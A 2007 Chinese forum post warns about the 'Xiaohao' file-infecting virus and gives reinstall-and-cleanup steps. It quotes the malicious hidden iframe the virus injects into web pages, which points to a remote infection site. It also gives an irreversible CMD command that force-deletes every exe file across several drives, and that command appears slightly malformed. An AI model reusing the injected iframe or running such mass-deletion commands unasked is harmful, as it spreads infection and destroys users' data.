TA的每日心情 | 开心 2016-3-27 14:15 |
---|
签到天数: 1 天 连续签到: 1 天 [LV.1]初来乍到
|
楼主 |
发表于 2007-8-18 10:50
|
显示全部楼层
[注意]请所有用户请立刻采取措施预防“小浩”病毒,否则会死的很惨!
如果你已经感染了该病毒,当你重新启动(一般手工杀毒必要步骤)后系统就会崩溃,因为病毒可能已经感染了你所有的exe文件,包括系统核心exe文件(比如ntoskrnl.exe、ntkrnlpa.exe等),这些文件遭到破坏,系统将无法启动。
所以一旦感染了该病毒,基本上就是对系统宣判了死刑——理论上讲是有办法不重装系统的,你需要将所有病毒进程干掉以保证当前的工作环境干净,并保证不再运行任何已被感染的病毒文件,不在让病毒通过任何途径被唤醒,然后拿出安装盘去修复系统文件,然后删除所有病毒文件和已感染文件,修复所有被病毒破坏的注册表项、网页文件等,搞定!
但是我想如果你不是手工杀毒老手,还是老老实实的格盘,重装系统吧。如果你还是想试试,建议你首先把所有重要数据(哪怕是被感染了的)做备份,然后再试。
以下方法适用于重装系统及以后的过程:
1、插入安装盘,格式化C盘(或者你之前安装系统的盘),然后重装系统。
2、必须设置足够复杂的密码,并且在进行完第5步之前拔掉你的网线!
3、当你进入系统后,切记不要双击打开任何盘,否则你的系统就白装了!如果你非要打开,那么请使用右键菜单中的“打开”选项。
4、除系统盘外其他的所有盘里如果没有重要数据,建议直接格式化(在进行步骤4前千万不要双击打开任何盘!!)。如果有重要数据,并且那些数据不是exe文件,请运行CMD打开命令行,执行以下命令:
FOR %I IN (d:,e:,f DO CD /D %I & FOR %J IN (*.exe,autorun.inf) DO DEL %J /A HS /F /S
该命令的作用是删除D\E\F盘下所有目录的所有exe文件(因为被感染了,且无法修复,不删除还留着做纪念啊?),以及每个盘根目录下的autorun.inf文件。这里没有写C盘(第一个括号),因为默认C盘是系统盘,如果你的系统装到了X盘,就把X盘不写,其他所有的盘符按照第一个括号里的格式补充进去。
请注意:这一步的删除操作是无法返回的,请确认你那些exe文件都没用了再进行。
5、检查所有的htm\html\php\jsp\asp\aspx文件,删除这些文件代码中的以下行(在进行步骤5前千万不要双击打开这些文件!!):
<iframe src=http://xiaohao.yona.biz/xiaohao.htm width=0 height=0></iframe>
该步操作的原因是病毒会在这些文件中写入以上这句代码,任何人打开这些文件都会自动浏览上面这个链接,而浏览链接的直接结果就是:再次中毒!
6、截至到这一步,病毒留下的东西就被消灭干净了,现在要做的是预防!插上网线,按照本帖1楼的方法立刻开始预防!
|
|